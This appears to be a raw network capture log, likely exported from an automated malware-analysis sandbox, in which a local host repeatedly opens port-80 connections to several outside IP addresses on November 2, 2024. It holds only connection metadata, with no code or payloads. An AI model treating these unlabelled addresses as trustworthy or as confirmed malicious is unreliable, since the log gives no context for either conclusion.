                                                                                                                    Nov 2, 2024 19:59:50.033489943 CET4998880192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:50.138272047 CET804998831.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:50.138340950 CET4998880192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:50.549206972 CET4998880192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:51.573139906 CET5000380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:51.577980995 CET805000331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:51.580908060 CET5000380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:51.637392998 CET5000380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:51.642287016 CET805000331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:52.507708073 CET805000331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:52.549123049 CET5000380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:52.658811092 CET805000331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:52.658937931 CET5000380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:52.660255909 CET5000380192.168.2.431.31.196.17
                                                                                                                    Nov 2, 2024 19:59:52.665081978 CET805000331.31.196.17192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:57.707344055 CET5001580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:57.712727070 CET80500153.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:57.712793112 CET5001580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:57.723486900 CET5001580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:57.731391907 CET80500153.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:58.356503010 CET80500153.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 19:59:58.356579065 CET5001580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:59.236785889 CET5001580192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 19:59:59.241775990 CET80500153.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:00.259710073 CET5001680192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:00.264806032 CET80500163.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:00.267787933 CET5001680192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:00.279696941 CET5001680192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:00.284653902 CET80500163.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:00.976939917 CET80500163.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:00.977003098 CET5001680192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:01.783684015 CET5001680192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:01.788681030 CET80500163.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.864077091 CET5001780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:02.869152069 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.869575024 CET5001780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:02.883326054 CET5001780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:02.888281107 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.888299942 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.888309002 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.888501883 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.888513088 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.888571978 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.888578892 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.888586044 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:02.888593912 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:04.393140078 CET5001780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:04.405680895 CET80500173.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:04.405797005 CET5001780192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:05.412517071 CET5001880192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:05.417890072 CET80500183.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:05.417960882 CET5001880192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:05.427206039 CET5001880192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:05.432194948 CET80500183.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:07.011657000 CET80500183.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:07.012289047 CET80500183.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:07.012342930 CET5001880192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:07.014733076 CET5001880192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:07.019522905 CET80500183.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:12.051718950 CET5001980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:12.056741953 CET80500193.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:12.063714981 CET5001980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:12.071715117 CET5001980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:12.076569080 CET80500193.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:12.697487116 CET80500193.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:12.699784994 CET5001980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:13.580495119 CET5001980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:13.585386992 CET80500193.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:14.599303961 CET5002080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:14.604547024 CET80500203.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:14.604638100 CET5002080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:14.615715027 CET5002080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:14.620668888 CET80500203.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:15.333970070 CET80500203.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:15.334033966 CET5002080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:16.127386093 CET5002080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:16.132390976 CET80500203.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.146564960 CET5002180192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:17.151591063 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.151674032 CET5002180192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:17.162743092 CET5002180192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:17.167871952 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.167882919 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.168004036 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.168011904 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.168054104 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.168062925 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.168128967 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.168138027 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.168160915 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.817600965 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:17.817660093 CET5002180192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:18.675729990 CET5002180192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:18.680948019 CET80500213.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:19.693687916 CET5002280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:19.698831081 CET80500223.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:19.698913097 CET5002280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:19.707557917 CET5002280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:19.712512016 CET80500223.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:20.361977100 CET80500223.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:20.362535000 CET80500223.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:20.362829924 CET5002280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:20.365091085 CET5002280192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:00:20.369925976 CET80500223.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:25.565785885 CET5002380192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:25.570750952 CET8050023199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:25.570818901 CET5002380192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:25.583009005 CET5002380192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:25.587872982 CET8050023199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:26.299828053 CET8050023199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:26.339823008 CET8050023199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:26.343825102 CET5002380192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:27.096195936 CET5002380192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:28.123748064 CET5002480192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:28.310467958 CET8050024199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:28.310580015 CET5002480192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:28.321188927 CET5002480192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:28.325990915 CET8050024199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:29.019227028 CET8050024199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:29.057291985 CET8050024199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:29.057363987 CET5002480192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:29.858191013 CET5002480192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:30.864890099 CET5002580192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:30.869924068 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.870002985 CET5002580192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:30.883768082 CET5002580192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:30.888703108 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.888715029 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.888722897 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.888751030 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.888760090 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.888813019 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.888834953 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.888850927 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:30.888859987 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:31.579747915 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:31.618524075 CET8050025199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:31.618571997 CET5002580192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:32.395746946 CET5002580192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:33.412795067 CET5002680192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:33.417779922 CET8050026199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:33.417851925 CET5002680192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:33.426513910 CET5002680192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:33.431446075 CET8050026199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:34.140044928 CET8050026199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:34.178642035 CET8050026199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:34.178759098 CET5002680192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:34.179752111 CET5002680192.168.2.4199.192.21.169
                                                                                                                    Nov 2, 2024 20:00:34.184659004 CET8050026199.192.21.169192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:39.211482048 CET5002780192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:39.216507912 CET805002715.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:39.216609001 CET5002780192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:39.228179932 CET5002780192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:39.233069897 CET805002715.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:40.094036102 CET805002715.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:40.094151974 CET805002715.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:40.094161034 CET805002715.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:40.094206095 CET5002780192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:40.094319105 CET805002715.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:40.094357967 CET5002780192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:40.736790895 CET5002780192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:41.755597115 CET5002880192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:41.761476994 CET805002815.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:41.761544943 CET5002880192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:41.771465063 CET5002880192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:41.776319027 CET805002815.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:42.393237114 CET805002815.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:42.393731117 CET805002815.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:42.393781900 CET5002880192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:43.283684015 CET5002880192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:44.319713116 CET5002980192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:44.324877977 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.329818010 CET5002980192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:44.351795912 CET5002980192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:44.356868029 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.356899977 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.356909990 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.356918097 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.356928110 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.357131004 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.357141018 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.357148886 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.357160091 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.958729982 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.959285975 CET805002915.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:44.959597111 CET5002980192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:45.861780882 CET5002980192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:46.887765884 CET5003080192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:46.892667055 CET805003015.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:46.899338961 CET5003080192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:46.975892067 CET5003080192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:46.980839014 CET805003015.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:47.554290056 CET805003015.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:47.554863930 CET805003015.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:47.554910898 CET5003080192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:47.558386087 CET5003080192.168.2.415.197.225.128
                                                                                                                    Nov 2, 2024 20:00:47.563316107 CET805003015.197.225.128192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:52.649921894 CET5003180192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:52.656445026 CET8050031188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:52.660583019 CET5003180192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:52.680602074 CET5003180192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:52.685823917 CET8050031188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:53.314119101 CET8050031188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:53.315696001 CET8050031188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:53.315766096 CET5003180192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:54.189939976 CET5003180192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:55.209422112 CET5003280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:55.214406967 CET8050032188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:55.214472055 CET5003280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:55.226794004 CET5003280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:55.231597900 CET8050032188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:55.849051952 CET8050032188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:55.850814104 CET8050032188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:55.850868940 CET5003280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:56.736803055 CET5003280192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:57.756455898 CET5003380192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:57.761365891 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.761451960 CET5003380192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:57.774769068 CET5003380192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:57.779618025 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.779637098 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.779647112 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.779692888 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.779701948 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.779781103 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.779849052 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.779859066 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:57.779866934 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:58.396493912 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:58.398418903 CET8050033188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:00:58.402103901 CET5003380192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:00:59.283700943 CET5003380192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:01:00.306293964 CET5003480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:01:00.319587946 CET8050034188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:00.322285891 CET5003480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:01:00.329298019 CET5003480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:01:00.339570045 CET8050034188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:01.003113985 CET8050034188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:01.007765055 CET8050034188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:01.010025024 CET5003480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:01:01.015799046 CET5003480192.168.2.4188.114.97.3
                                                                                                                    Nov 2, 2024 20:01:01.021034002 CET8050034188.114.97.3192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:06.103812933 CET5003580192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:06.108772039 CET805003584.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:06.109905005 CET5003580192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:06.121818066 CET5003580192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:06.126837015 CET805003584.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:06.956959009 CET805003584.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:06.958870888 CET5003580192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:07.627902031 CET5003580192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:07.632824898 CET805003584.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:08.645677090 CET5003680192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:08.650677919 CET805003684.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:08.650816917 CET5003680192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:08.661185026 CET5003680192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:08.666104078 CET805003684.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:09.490569115 CET805003684.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:09.490639925 CET5003680192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:10.181932926 CET5003680192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:10.186925888 CET805003684.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.193876028 CET5003780192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:11.198914051 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.199037075 CET5003780192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:11.211396933 CET5003780192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:11.216350079 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.216360092 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.216388941 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.216398001 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.216450930 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.216460943 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.216480970 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.216490030 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:11.216499090 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:12.032305956 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:12.032392979 CET5003780192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:12.721239090 CET5003780192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:12.726178885 CET805003784.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:13.740384102 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:13.745539904 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:13.745620012 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:13.754062891 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:13.759530067 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572350025 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572371006 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572387934 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572402000 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572415113 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572427034 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572455883 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:14.572520018 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:14.572552919 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572565079 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572576046 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572587013 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.572601080 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:14.572653055 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:14.684763908 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:14.684870005 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:14.685725927 CET5003880192.168.2.484.32.84.32
                                                                                                                    Nov 2, 2024 20:01:14.690479040 CET805003884.32.84.32192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:19.717910051 CET5003980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:19.722793102 CET80500393.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:19.722865105 CET5003980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:19.735666990 CET5003980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:19.740560055 CET80500393.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:20.445976973 CET80500393.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:20.446412086 CET5003980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:21.236901045 CET5003980192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:21.241995096 CET80500393.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:22.257991076 CET5004080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:22.263044119 CET80500403.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:22.263242960 CET5004080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:22.274002075 CET5004080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:22.278886080 CET80500403.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:22.912985086 CET80500403.33.130.190192.168.2.4
                                                                                                                    Nov 2, 2024 20:01:22.913096905 CET5004080192.168.2.43.33.130.190
                                                                                                                    Nov 2, 2024 20:01:23.783886909 CET5004080192.168.2.43.33.130.190
